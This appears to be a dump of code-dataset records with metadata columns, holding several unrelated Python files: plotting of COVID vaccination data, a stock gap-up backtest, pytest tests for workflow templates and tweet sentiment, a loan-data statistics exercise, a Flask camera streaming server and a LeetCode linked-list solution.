'y_title': 'Total doses',
'scales': ['linear'],
'height': 450,
'width': 800,
},
],
'NI COVID-19 vaccination progress up to %s' %(
datetime.datetime.today().strftime('%A %-d %B %Y'),
),
[
'Dose 1/2 data from PHE dashboard/API, Dose 3/Booster collected from NI dashboard',
'https://twitter.com/ni_covid19_data'
]
)
# %%
p = plot_points_average_and_trend(
[
{
'points': None,
'line': boosters.set_index(['Publication Date','Metric'])['Doses'],
'colour': 'Metric',
'date_col': 'Publication Date',
'x_title': 'Date',
'y_title': 'Total doses',
'scales': ['linear'],
'height': 450,
'width': 800,
# 'colour_domain': ['Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','Second doses 8 months earlier'],
# 'colour_range': ['#ff0000','#2b7e9e','#52b4cf','#7eedff'],
},
],
'NI COVID-19 booster vaccination progress vs second dose up to %s' %(
datetime.datetime.today().strftime('%A %-d %B %Y'),
),
[
'Dose 2 data from PHE dashboard/API, Booster data collected from NI dashboard',
'https://twitter.com/ni_covid19_data'
]
)
p.save('ni-boosters-%s.png'%(datetime.datetime.now().date().strftime('%Y-%m-%d')))
p
# %%
| 0 | 0 | 0 |
12d73c6d2017c67c4a8634393e9f0c3835f37434 | 2,369 | py | Python | stock/strategy/gapup.py | shenzhongqiang/cnstock_py | 2bb557657a646acb9d20d3ce78e15cf68390f8ea | [
"MIT"
] | 2 | 2016-10-31T04:05:11.000Z | 2017-04-17T08:46:53.000Z | stock/strategy/gapup.py | shenzhongqiang/cnstock_py | 2bb557657a646acb9d20d3ce78e15cf68390f8ea | [
"MIT"
] | null | null | null | stock/strategy/gapup.py | shenzhongqiang/cnstock_py | 2bb557657a646acb9d20d3ce78e15cf68390f8ea | [
"MIT"
] | null | null | null | import sys
import copy
import numpy as np
import pandas as pd
from sklearn.svm import SVR
import matplotlib.pyplot as plt
from matplotlib.finance import candlestick
from matplotlib.dates import date2num, WeekdayLocator, DateFormatter, MONDAY, MonthLocator
from stock.utils.symbol_util import *
from stock.globalvar import *
from stock.marketdata import *
from stock.filter.utils import *
# Backtest of a simple gap-up strategy on the Shanghai composite index.
# Python 2 code: note the `print` statements and the list-returning `map`.
symbols = get_stock_symbols('all')
marketdata = backtestdata.BackTestData("160105")
x = []
y = []
# Daily bars for index sh000001, reversed into oldest-first order.
history = marketdata.get_archived_history_in_file("sh000001")
history.reverse()
dates = map(lambda x: x.date, history)
highs = map(lambda x: x.high, history)
lows = map(lambda x: x.low, history)
opens = map(lambda x: x.open, history)
closes = map(lambda x: x.close, history)
volumes = map(lambda x: x.volume, history)
df = pd.DataFrame({"high": highs,
                   "low": lows,
                   "open": opens,
                   "close": closes,
                   "volume": volumes}, index=dates)
# Features: gap size at the open, next-day open-to-open change, lagged 20-day MA.
df['last_close'] = df.close.shift(1)
df['next_open'] = df.open.shift(-1)
df['gapup'] = pd.Series(df.open / df.close.shift(1) - 1)
df.index = pd.to_datetime(df.index, format='%y%m%d')
df['chg'] = df['open'].pct_change().shift(-1)
#df['chg'] = df['close'] / df['open'] - 1
# NOTE(review): pd.rolling_mean was removed in later pandas; this needs pandas < 0.18.
df['ma20'] = pd.rolling_mean(df.close, 20).shift(1)
# Trade only 2015 sessions where the 20-day MA is rising and the open gaps up >0.2%.
result_df = df['2015-01-01': '2015-12-30']
result_df = result_df[result_df.ma20 > result_df.ma20.shift(1)]
gap_df = result_df[result_df.gapup > 0.002]
print gap_df
# Equity curve and maximum drawdown of the selected trades.
pl = (gap_df.chg + 1).cumprod()
j = np.argmax(np.maximum.accumulate(pl) - pl)  # drawdown trough
i = np.argmax(pl[:j])  # peak before the trough; NOTE(review): fails when j == 0
max_drawdown = pl[i] - pl[j]
print len(pl), max_drawdown, pl[-1]
fig = plt.figure()
dates = gap_df.index
ax2 = fig.add_subplot(1,1,1)
ax2.xaxis.set_major_formatter(DateFormatter("%Y%m%d"))
ax2.xaxis_date()
plt.setp(plt.gca().get_xticklabels(), rotation=90, horizontalalignment='right')
ax2.plot(dates, pl)
plt.show()
#''' tuning code
# Sweep the gap threshold and record final P&L, max drawdown and volatility.
x = []
y = []
z = []
d = []
for gap in np.linspace(-0.02, 0.02, 1000):
    gap_df = result_df[result_df.gapup > gap]
    if len(gap_df.values) < 1:
        continue
    pl = (gap_df.chg + 1).cumprod()
    j = np.argmax(np.maximum.accumulate(pl) - pl)
    i = np.argmax(pl[:j])
    max_drawdown = pl[i] - pl[j]
    x.append(gap)
    y.append(pl[-1])
    z.append(max_drawdown)
    d.append(gap_df.chg.std())
fig, axes = plt.subplots(3, 1)
axes[0].plot(x, y)
axes[1].plot(x, z)
axes[2].plot(x, d)
plt.show()
#'''
| 28.890244 | 90 | 0.67919 | import sys
import copy
import numpy as np
import pandas as pd
from sklearn.svm import SVR
import matplotlib.pyplot as plt
from matplotlib.finance import candlestick
from matplotlib.dates import date2num, WeekdayLocator, DateFormatter, MONDAY, MonthLocator
from stock.utils.symbol_util import *
from stock.globalvar import *
from stock.marketdata import *
from stock.filter.utils import *
symbols = get_stock_symbols('all')
marketdata = backtestdata.BackTestData("160105")
x = []
y = []
history = marketdata.get_archived_history_in_file("sh000001")
history.reverse()
dates = map(lambda x: x.date, history)
highs = map(lambda x: x.high, history)
lows = map(lambda x: x.low, history)
opens = map(lambda x: x.open, history)
closes = map(lambda x: x.close, history)
volumes = map(lambda x: x.volume, history)
df = pd.DataFrame({"high": highs,
"low": lows,
"open": opens,
"close": closes,
"volume": volumes}, index=dates)
df['last_close'] = df.close.shift(1)
df['next_open'] = df.open.shift(-1)
df['gapup'] = pd.Series(df.open / df.close.shift(1) - 1)
df.index = pd.to_datetime(df.index, format='%y%m%d')
df['chg'] = df['open'].pct_change().shift(-1)
#df['chg'] = df['close'] / df['open'] - 1
df['ma20'] = pd.rolling_mean(df.close, 20).shift(1)
result_df = df['2015-01-01': '2015-12-30']
result_df = result_df[result_df.ma20 > result_df.ma20.shift(1)]
gap_df = result_df[result_df.gapup > 0.002]
print gap_df
pl = (gap_df.chg + 1).cumprod()
j = np.argmax(np.maximum.accumulate(pl) - pl)
i = np.argmax(pl[:j])
max_drawdown = pl[i] - pl[j]
print len(pl), max_drawdown, pl[-1]
fig = plt.figure()
dates = gap_df.index
ax2 = fig.add_subplot(1,1,1)
ax2.xaxis.set_major_formatter(DateFormatter("%Y%m%d"))
ax2.xaxis_date()
plt.setp(plt.gca().get_xticklabels(), rotation=90, horizontalalignment='right')
ax2.plot(dates, pl)
plt.show()
#''' tuning code
x = []
y = []
z = []
d = []
for gap in np.linspace(-0.02, 0.02, 1000):
gap_df = result_df[result_df.gapup > gap]
if len(gap_df.values) < 1:
continue
pl = (gap_df.chg + 1).cumprod()
j = np.argmax(np.maximum.accumulate(pl) - pl)
i = np.argmax(pl[:j])
max_drawdown = pl[i] - pl[j]
x.append(gap)
y.append(pl[-1])
z.append(max_drawdown)
d.append(gap_df.chg.std())
fig, axes = plt.subplots(3, 1)
axes[0].plot(x, y)
axes[1].plot(x, z)
axes[2].plot(x, d)
plt.show()
#'''
| 0 | 0 | 0 |
99b469d88749b5c5e4fcfb6f7404572eef939fc6 | 62 | py | Python | mplibtest.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | mplibtest.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | mplibtest.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
plt.plot(range(10))
plt.show() | 20.666667 | 31 | 0.774194 | import matplotlib.pyplot as plt
plt.plot(range(10))
plt.show() | 0 | 0 | 0 |
87496910ea9ab1a763212c44a602527db390c55c | 1,317 | py | Python | cli/test/functional/test_step_functions.py | mattsb42/accretion | 7cce5f4ed6d290bd9314b116be91417ded6b0f64 | [
"Apache-2.0"
] | 1 | 2019-10-19T11:18:17.000Z | 2019-10-19T11:18:17.000Z | cli/test/functional/test_step_functions.py | mattsb42/accretion | 7cce5f4ed6d290bd9314b116be91417ded6b0f64 | [
"Apache-2.0"
] | 13 | 2019-06-10T07:03:26.000Z | 2019-11-06T01:09:38.000Z | cli/test/functional/test_step_functions.py | mattsb42/accretion | 7cce5f4ed6d290bd9314b116be91417ded6b0f64 | [
"Apache-2.0"
] | null | null | null | """Functional tests for ``accretion_cli._stepfunctions``."""
import json
import pytest
from accretion_cli._templates.services.stepfunctions import _artifact_builder_workflow, _replication_listener_workflow
from .functional_test_utils import load_vector
pytestmark = [pytest.mark.local, pytest.mark.functional]
| 29.266667 | 118 | 0.759301 | """Functional tests for ``accretion_cli._stepfunctions``."""
import json
import pytest
from accretion_cli._templates.services.stepfunctions import _artifact_builder_workflow, _replication_listener_workflow
from .functional_test_utils import load_vector
# Apply the `local` and `functional` marks to every test in this module.
pytestmark = [pytest.mark.local, pytest.mark.functional]
def _assert_equal_workflows(test, expected):
assert test == expected
test_json = json.dumps(test, indent=4)
expected_json = json.dumps(expected, indent=4)
assert test_json == expected_json
def test_artifact_builder_workflow():
    """The generated artifact-builder state machine matches the stored vector."""
    expected = load_vector("artifact_builder_workflow")
    actual = _artifact_builder_workflow(
        parse_requirements_arn="${ParseRequirementsFunction.Arn}",
        build_python_36_arn="${PythonBuilder36Function.Arn}",
        build_python_37_arn="${PythonBuilder37Function.Arn}",
    )
    _assert_equal_workflows(actual, expected)
def test_replication_listener_workflow():
    """The generated replication-listener state machine matches the stored vector."""
    expected = load_vector("replication_listener_workflow")
    actual = _replication_listener_workflow(
        filter_arn="${EventFilterFunction.Arn}",
        locate_artifact_arn="${ArtifactLocatorFunction.Arn}",
        publish_layer_arn="${LayerVersionPublisherFunction.Arn}",
        sns_topic_arn="${NotifyTopic}",
    )
    _assert_equal_workflows(actual, expected)
| 931 | 0 | 69 |
1e2b33389dc089f41107ab2ec2a2cb95a2e849f3 | 5,167 | py | Python | tests/test_tweet_sentiment.py | chrisfalter/BLM | eeb3eb3e011ec2ec02a21f90451422b5e22c2b9e | [
"MIT"
] | 1 | 2021-06-13T15:55:49.000Z | 2021-06-13T15:55:49.000Z | tests/test_tweet_sentiment.py | chrisfalter/BLM | eeb3eb3e011ec2ec02a21f90451422b5e22c2b9e | [
"MIT"
] | null | null | null | tests/test_tweet_sentiment.py | chrisfalter/BLM | eeb3eb3e011ec2ec02a21f90451422b5e22c2b9e | [
"MIT"
] | null | null | null | import pytest
from src.tweet_sentiment import (
EmoScores,
PronounCounts,
SentimentAnalysis,
summarize_sentiment,
_get_emotion_scores,
_get_pronoun_counts,
_get_sentiment
)
sample_text = "It was the best of times, it was the worst of times, " \
"it was the age of wisdom, it was the age of foolishness, " \
"it was the epoch of belief, it was the epoch of incredulity, " \
"it was the season of Life, it was the season of Darkness, " \
"it was the spring of hope, it was the winter of despair, " \
"we had everything before us, we had nothing before us, " \
"we were all going direct to Heaven, we were all going direct the other way --" \
"in short, the period was so far the like present period, that some of its noisiest authorities " \
"insisted on its being received, for good or for evil, in the superlative degree of comparison only. " \
"I'd always say, you'll only live once. Let's go, y'all!" # Added for testing; Dickens did not say this!
| 35.881944 | 108 | 0.689375 | import pytest
from src.tweet_sentiment import (
EmoScores,
PronounCounts,
SentimentAnalysis,
summarize_sentiment,
_get_emotion_scores,
_get_pronoun_counts,
_get_sentiment
)
# Fixture text: the opening of A Tale of Two Cities plus an appended final
# sentence that adds contraction pronouns (I'd, you'll, y'all) for the
# pronoun-count tests.
sample_text = "It was the best of times, it was the worst of times, " \
              "it was the age of wisdom, it was the age of foolishness, " \
              "it was the epoch of belief, it was the epoch of incredulity, " \
              "it was the season of Life, it was the season of Darkness, " \
              "it was the spring of hope, it was the winter of despair, " \
              "we had everything before us, we had nothing before us, " \
              "we were all going direct to Heaven, we were all going direct the other way --" \
              "in short, the period was so far the like present period, that some of its noisiest authorities " \
              "insisted on its being received, for good or for evil, in the superlative degree of comparison only. " \
              "I'd always say, you'll only live once. Let's go, y'all!" # Added for testing; Dickens did not say this!
def test_getEmotionScores_shouldReturnPositiveValues_whenAllEmotionsIncluded():
    """The Dickens sample touches all eight NRC emotions, so every score is > 0."""
    scores = _get_emotion_scores(sample_text)
    for emotion_score in (
        scores.trust,
        scores.anticipation,
        scores.joy,
        scores.surprise,
        scores.anger,
        scores.disgust,
        scores.fear,
        scores.sadness,
    ):
        assert emotion_score > 0.0
def test_getEmotionScores_shouldReturnSomeZeros_whenSomeEmotionsAbsent():
    """A purely happy sentence scores zero on every negative emotion."""
    happy_text = "I love my family. They make me so happy!"
    scores = _get_emotion_scores(happy_text)
    for absent in (scores.sadness, scores.fear, scores.anger, scores.disgust):
        assert absent == 0.0
    for present in (scores.joy, scores.trust):
        assert present > 0.0
def test_getEmotionScores_returnsZeros_whenTextIsVeryShort():
    """A single word with no affect entries yields all-zero scores."""
    scores = _get_emotion_scores("Gondwana")
    for value in (
        scores.trust,
        scores.anticipation,
        scores.surprise,
        scores.sadness,
        scores.fear,
        scores.anger,
        scores.disgust,
        scores.joy,
    ):
        assert value == 0.0
def test_getEmotionScores_handlesAnticipationCorrectly():
    """Guard against NRCLex's 'anticip' key quirk.

    NRCLex's affect-frequency dict sometimes uses the key 'anticip' rather
    than 'anticipation' (arguably a bug in NRCLex); the analyzer must still
    report a clean anticipation score of zero for this tweet.
    """
    tweet = (
        'Arrested for hanging a banner. While Darren Wilson still remains free '
        'for killing a Black teen. #BlackLivesMatter http://t.co/de8xpE2v5r'
    )
    assert _get_emotion_scores(tweet).anticipation == 0.0
def test_getPronounCounts_shouldBeAccurate_whenContractionsUsed():
    """Pronouns hidden in contractions (I'd, you'll, y'all) are still counted."""
    counts = _get_pronoun_counts(sample_text)
    expected = {"first_singular": 1, "first_plural": 7, "second": 2, "third": 12}
    for attribute, count in expected.items():
        assert getattr(counts, attribute) == count
def test_pronounCounts_shouldDoMathOperations():
    """PronounCounts supports ==, +, +=, * and / with intuitive semantics."""
    left = PronounCounts(1, 2, 3, 4)
    right = PronounCounts(1, 2, 3, 4)
    assert left == right
    doubled = PronounCounts(2, 4, 6, 8)
    total = left + right
    assert total == doubled
    assert total / 2 == left
    left += right
    assert left == doubled
    assert right * 2 == doubled
def test_getSentiment_shouldReturnPositive_whenTweetIsHappy():
    """A happy tweet scores in (0, 1]."""
    score = _get_sentiment("I'm so happy today!")
    assert 0.0 < score <= 1.0
def test_getSentiment_shouldReturnNegative_whenTweetIsSad():
    """A sad tweet scores in [-1, 0)."""
    score = _get_sentiment("I'm sad, tears are pouring from my eyes, I'm so sad.")
    assert -1.0 <= score < 0.0
def test_pronounCounts_shouldReturnNormalizedValues_whenGetProportionsCalled():
    """get_proportions divides each count by the overall total (1+2+3+4 = 10)."""
    proportions = PronounCounts(1, 2, 3, 4).get_proportions()
    assert proportions == PronounCounts(0.1, 0.2, 0.3, 0.4)
def test_pronounCountsGetProportions_shouldReturnZeros_whenNoPronouns():
    """With no pronouns at all the proportions stay zero rather than dividing by 0."""
    zeros = PronounCounts(0, 0, 0, 0)
    assert zeros.get_proportions() == zeros
def test_emoScores_shouldPerformMathOps_whenUsedWithMathSyntax():
    """EmoScores supports scalar *, scalar / and element-wise +."""
    base = EmoScores(0.2, 0.2, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1)
    doubled = base * 2
    assert doubled == EmoScores(0.2 * 2, 0.2 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2)
    assert doubled / 2 == base
    assert base + base == doubled
def test_summarizeSentiment_shouldNormalizeSummedSentiments_whenGivenList():
    """summarize_sentiment averages analyses and normalises pronoun counts."""
    first = SentimentAnalysis(
        pronoun_counts=PronounCounts(0, 1, 2, 5),
        emo_scores=EmoScores(0, 0.25, 0, 0.25, 0, 0.25, 0, 0.25),
        sentiment=0.4,
    )
    second = SentimentAnalysis(
        pronoun_counts=PronounCounts(0, 1, 2, 5),
        emo_scores=EmoScores(0.25, 0, 0.25, 0, 0.25, 0, 0.25, 0),
        sentiment=0.2,
    )
    summary = summarize_sentiment([first, second])
    # Pronoun proportions over the pooled counts (total = 16).
    assert summary.pronoun_counts == PronounCounts(0.0, 0.125, 0.25, 0.625)
    # Emotion scores are the element-wise mean of the two inputs.
    assert summary.emo_scores == EmoScores(0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125)
    # Sentiment is the plain mean, compared within float tolerance.
    assert summary.sentiment == pytest.approx(0.3)
| 3,863 | 0 | 276 |
a8ff93872dcb01832b50b6a88d9561e1d8f9eda9 | 2,765 | py | Python | Banking-Inferences(Inferential-Statistics)/code.py | RohanBarghare/ga-learner-dsmp-repo | ec5aa9697d79da48b6e3446d2a9bc4f0544560c9 | [
"MIT"
] | null | null | null | Banking-Inferences(Inferential-Statistics)/code.py | RohanBarghare/ga-learner-dsmp-repo | ec5aa9697d79da48b6e3446d2a9bc4f0544560c9 | [
"MIT"
] | null | null | null | Banking-Inferences(Inferential-Statistics)/code.py | RohanBarghare/ga-learner-dsmp-repo | ec5aa9697d79da48b6e3446d2a9bc4f0544560c9 | [
"MIT"
] | null | null | null | # --------------
import pandas as pd
import scipy.stats as stats
import math
import numpy as np
import warnings
warnings.filterwarnings('ignore')
#Sample_Size
sample_size=2000
#Z_Critical Score
# One-sided 95% critical value of the standard normal (~1.645).
z_critical = stats.norm.ppf(q = 0.95)
# path [File location variable]
# NOTE(review): `path` must be injected by the hosting platform before this runs.
data=pd.read_csv(path)
#Code starts here
# 95% confidence interval for the mean installment from one random sample,
# then compare against the true population mean.
data_sample=data.sample(n=sample_size,random_state=0)
sample_mean=data_sample['installment'].mean()
sample_std=data_sample['installment'].std()
margin_of_error= z_critical * (sample_std/math.sqrt(sample_size))
confidence_interval =(sample_mean - margin_of_error,
                      sample_mean + margin_of_error)
true_mean=data['installment'].mean()
print("True mean :{}".format(true_mean))
# --------------
import matplotlib.pyplot as plt
import numpy as np
#Different sample sizes to take
sample_size=np.array([20,50,100])
#Code starts here
# Sampling distribution of the mean: for each sample size draw 1000 random
# samples and histogram their means (Central Limit Theorem demonstration).
fig ,axes = plt.subplots(nrows = 3 , ncols = 1)
for i in range(len(sample_size)):
    m = []
    for j in range(1000):
        # BUG FIX: the sample was drawn but discarded, so every appended
        # value was the full-population mean and each histogram collapsed
        # to a single bar. Take the mean OF THE SAMPLE instead.
        m.append(data['installment'].sample(n=sample_size[i]).mean())
    mean_series = pd.Series(m)
    axes[i].hist(mean_series)
# --------------
# One-sided z-test: are small-business interest rates above the overall mean?
from statsmodels.stats.weightstats import ztest
# Strip the '%' suffix and rescale the rates to fractions.
data['int.rate'] = data['int.rate'].str.replace('%','')
data['int.rate'] = data['int.rate'].astype(float)/100
small_business_rates = data.loc[data['purpose'] == 'small_business', 'int.rate']
z_statistic, p_value = ztest(
    small_business_rates,
    value=data['int.rate'].mean(),
    alternative='larger',
)
reject_null = p_value < 0.05 # alpha value is 0.05 or 5%
if reject_null:
    print(" we are rejecting null hypothesis")
else:
    print("we are failed to reject null hypothesis")
# --------------
# Two-sample z-test: do defaulters and repayers differ in installment size?
from statsmodels.stats.weightstats import ztest
defaulted = data.loc[data['paid.back.loan'] == 'No', 'installment']
repaid = data.loc[data['paid.back.loan'] == 'Yes', 'installment']
z_statistic, p_value = ztest(defaulted, repaid)
if p_value < 0.05:
    print('we are rejecting null ')
else:
    print('we are failed to reject null hypothesis')
# --------------
#Importing header files
from scipy.stats import chi2_contingency
#Critical value
critical_value = stats.chi2.ppf(q = 0.95, # Find the critical value for 95% confidence*
                                df = 6) # Df = number of variable categories(in purpose) - 1
#Code starts here
# Chi-square test of independence: loan purpose vs. repayment outcome.
yes = data[data['paid.back.loan']=='Yes']['purpose'].value_counts()
no = data[data['paid.back.loan']=='No']['purpose'].value_counts()
# FIX: pass `axis` by keyword — positional `axis` for pd.concat is deprecated
# and removed in pandas 2.0.
observed = pd.concat([yes.transpose(),no.transpose()], axis=1, keys=['Yes','No'])
chi2, p, dof, ex = chi2_contingency(observed, correction=False)
print("Critical value")
print(critical_value)
print("Chi Statistic")
print(chi2)
# --------------
print(chi2)
| 27.929293 | 88 | 0.670163 | # --------------
import pandas as pd
import scipy.stats as stats
import math
import numpy as np
import warnings
warnings.filterwarnings('ignore')
#Sample_Size
sample_size=2000
#Z_Critical Score
z_critical = stats.norm.ppf(q = 0.95)
# path [File location variable]
data=pd.read_csv(path)
#Code starts here
data_sample=data.sample(n=sample_size,random_state=0)
sample_mean=data_sample['installment'].mean()
sample_std=data_sample['installment'].std()
margin_of_error= z_critical * (sample_std/math.sqrt(sample_size))
confidence_interval =(sample_mean - margin_of_error,
sample_mean + margin_of_error)
true_mean=data['installment'].mean()
print("True mean :{}".format(true_mean))
# --------------
import matplotlib.pyplot as plt
import numpy as np
#Different sample sizes to take
sample_size=np.array([20,50,100])
#Code starts here
fig ,axes = plt.subplots(nrows = 3 , ncols = 1)
for i in range(len(sample_size)):
m = []
for j in range(1000):
data['installment'].sample(n=sample_size[i])
m.append(data['installment'].mean())
mean_series = pd.Series(m)
axes[i].hist(mean_series)
# --------------
#Importing header files
from statsmodels.stats.weightstats import ztest
#Code starts here
data['int.rate'] = data['int.rate'].str.replace('%','')
data['int.rate'] = data['int.rate'].astype(float)/100
x1 = data[data['purpose']=='small_business']['int.rate']
z_statistic,p_value= ztest(x1,value=data['int.rate'].mean(),alternative='larger')
if p_value < 0.05: # alpha value is 0.05 or 5%
print(" we are rejecting null hypothesis")
else:
print("we are failed to reject null hypothesis")
# --------------
#Importing header files
from statsmodels.stats.weightstats import ztest
#Code starts here
x1=data[data['paid.back.loan']=='No']['installment']
x2=data[data['paid.back.loan']=='Yes']['installment']
z_statistic,p_value=ztest(x1,x2)
if p_value < 0.05:
print('we are rejecting null ')
else:
print('we are failed to reject null hypothesis')
# --------------
#Importing header files
from scipy.stats import chi2_contingency
#Critical value
critical_value = stats.chi2.ppf(q = 0.95, # Find the critical value for 95% confidence*
df = 6) # Df = number of variable categories(in purpose) - 1
#Code starts here
yes = data[data['paid.back.loan']=='Yes']['purpose'].value_counts()
no = data[data['paid.back.loan']=='No']['purpose'].value_counts()
observed = pd.concat([yes.transpose(),no.transpose()], 1,keys=['Yes','No'])
chi2, p, dof, ex = chi2_contingency(observed, correction=False)
print("Critical value")
print(critical_value)
print("Chi Statistic")
print(chi2)
# --------------
print(chi2)
| 0 | 0 | 0 |
090738636e324433c3033993224836a0912177a0 | 3,453 | py | Python | face_streaming_server.py | PNUIOTLAB/face_recognition_client | ee44ebbc8e76cb940577dd9ce31fe06a09c18de6 | [
"BSL-1.0"
] | null | null | null | face_streaming_server.py | PNUIOTLAB/face_recognition_client | ee44ebbc8e76cb940577dd9ce31fe06a09c18de6 | [
"BSL-1.0"
] | null | null | null | face_streaming_server.py | PNUIOTLAB/face_recognition_client | ee44ebbc8e76cb940577dd9ce31fe06a09c18de6 | [
"BSL-1.0"
] | null | null | null | import cv2
import time
import threading
from flask import Response, Flask
import time
import os
import sys
import socket
import select
# Flask 객체로 Image frame 전달
global video_frame
video_frame = None
# 다양한 브라우저에서 프레임들의 thread-safe 출력을 잠근다.
global thread_lock
thread_lock = threading.Lock()
# Raspberry Camera에 접근하기 위한 GStreamer 파이프라인
GSTREAMER_PIPELINE = 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=21/1 ! nvvidconv flip-method=0 ! video/x-raw, width=960, height=616, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink wait-on-eos=false max-buffers=1 drop=True'
# 어플리케이션을 위한 Flask 오브젝트 생성
app = Flask(__name__)
@app.route("/")
if __name__ == '__main__':
IP = '192.168.0.50'
PORT = 5040
ADDR = (IP, PORT)
SIZE = 1024
Server_socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Server_socket1.bind(ADDR)
Server_socket1.listen()
read_socket_list = [Server_socket1]
conn_read_socket_list, conn_write_socket_list, conn_except_socket_list =select.select(read_socket_list, [], [])
for conn_read_socket in conn_read_socket_list:
if conn_read_socket == Server_socket1:
client_socket, client_addr = Server_socket1.accept()
msg = client_socket.recv(SIZE)
if msg.decode('UTF-8') == 'A':
print("실행합니다.")
# thread를 생성하고 이미지 프레임을 캡처하는 메소드를 첨가
process_thread = threading.Thread(target=captureFrames)
process_thread.daemon = True
# Start the thread
process_thread.start()
# start the Flask Web Application
# While it can be run on any feasible IP, IP = 192.168.0.50 renders the web app on
# the host machine's localhost and is discoverable by other machines on the same network
app.run("192.168.0.50", port="8000")
| 31.108108 | 313 | 0.637706 | import cv2
import time
import threading
from flask import Response, Flask
import time
import os
import sys
import socket
import select
# Flask 객체로 Image frame 전달
global video_frame
video_frame = None
# 다양한 브라우저에서 프레임들의 thread-safe 출력을 잠근다.
global thread_lock
thread_lock = threading.Lock()
# Raspberry Camera에 접근하기 위한 GStreamer 파이프라인
GSTREAMER_PIPELINE = 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=21/1 ! nvvidconv flip-method=0 ! video/x-raw, width=960, height=616, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink wait-on-eos=false max-buffers=1 drop=True'
# 어플리케이션을 위한 Flask 오브젝트 생성
app = Flask(__name__)
def restart():
print("프로그램 재시작")
executable = sys.executable
args = sys.argv[:]
args.insert(0, sys.executable)
time.sleep(1)
os.execvp(executable, args)
def captureFrames():
global video_frame, thread_lock
start_time = time.time()
# OpenCV로부터 비디오 캡처
video_capture = cv2.VideoCapture(GSTREAMER_PIPELINE, cv2.CAP_GSTREAMER)
while True and video_capture.isOpened():
return_key, frame = video_capture.read()
duration = time.time() - start_time
if not return_key:
break
# 프레임의 복사본을 생성하고 video_frame 변수에 저장
with thread_lock:
video_frame = frame.copy()
key = cv2.waitKey(30) & 0xff
if key == 27:
break
if duration >= 30:
print("20초 경과")
video_capture.release()
restart()
break
video_capture.release()
def encodeFrame():
global thread_lock
while True:
# video_frame 변수에 접근하기 위한 thread_lock 습득
with thread_lock:
global video_frame
if video_frame is None:
continue
return_key, encoded_image = cv2.imencode(".jpg", video_frame)
if not return_key:
continue
# 바이트 배열로 결과 이미지
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encoded_image) + b'\r\n')
@app.route("/")
def streamFrames():
return Response(encodeFrame(), mimetype="multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
IP = '192.168.0.50'
PORT = 5040
ADDR = (IP, PORT)
SIZE = 1024
Server_socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Server_socket1.bind(ADDR)
Server_socket1.listen()
read_socket_list = [Server_socket1]
conn_read_socket_list, conn_write_socket_list, conn_except_socket_list =select.select(read_socket_list, [], [])
for conn_read_socket in conn_read_socket_list:
if conn_read_socket == Server_socket1:
client_socket, client_addr = Server_socket1.accept()
msg = client_socket.recv(SIZE)
if msg.decode('UTF-8') == 'A':
print("실행합니다.")
# thread를 생성하고 이미지 프레임을 캡처하는 메소드를 첨가
process_thread = threading.Thread(target=captureFrames)
process_thread.daemon = True
# Start the thread
process_thread.start()
# start the Flask Web Application
# While it can be run on any feasible IP, IP = 192.168.0.50 renders the web app on
# the host machine's localhost and is discoverable by other machines on the same network
app.run("192.168.0.50", port="8000")
| 1,528 | 0 | 91 |
c5bc60fc16c77b9e8d2c61a215a4fe4027b0f78b | 1,401 | py | Python | LeetCode/python-R1/0024- 两两交换链表中的节点/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-08-27T11:28:03.000Z | 2020-12-24T07:10:22.000Z | LeetCode/python-R1/0024- 两两交换链表中的节点/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | null | null | null | LeetCode/python-R1/0024- 两两交换链表中的节点/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-09-20T09:44:01.000Z | 2020-12-24T07:10:23.000Z | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.37
工具: python == 3.7.3
"""
"""
思路:
暴力解法,直接取出所有元素,排序后再存入新的链表中
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了76.77%的用户
内存消耗 : 13.8 MB, 在所有 Python3 提交中击败了5.93%的用户
"""
# 定义链表
if __name__ == "__main__":
l1 = ListNode(1)
l1.next = ListNode(2)
l1.next.next = ListNode(3)
l1.next.next.next = ListNode(4)
l1.next.next.next.next = ListNode(5)
l1.next.next.next.next.next = ListNode(6)
head = l1
res = Solution().swapPairs(head)
while res:
print(res.val)
res = res.next | 23.35 | 65 | 0.540328 | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.37
工具: python == 3.7.3
"""
"""
思路:
暴力解法,直接取出所有元素,排序后再存入新的链表中
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了76.77%的用户
内存消耗 : 13.8 MB, 在所有 Python3 提交中击败了5.93%的用户
"""
# 定义链表
class ListNode:
def __init__(self,x):
self.val = x
self.next = None
class Solution:
def swapPairs(self, head):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
point = head
# 排除特殊情况
if head is None or head.next is None:
return head
while head:
# 正常情况:两两交换
if head.next.next is not None:
head.val, head.next.val = head.next.val, head.val
head = head.next.next
# 奇数个节点时
if head.next is not None and head.next.next is None:
head.val, head.next.val = head.next.val, head.val
return point
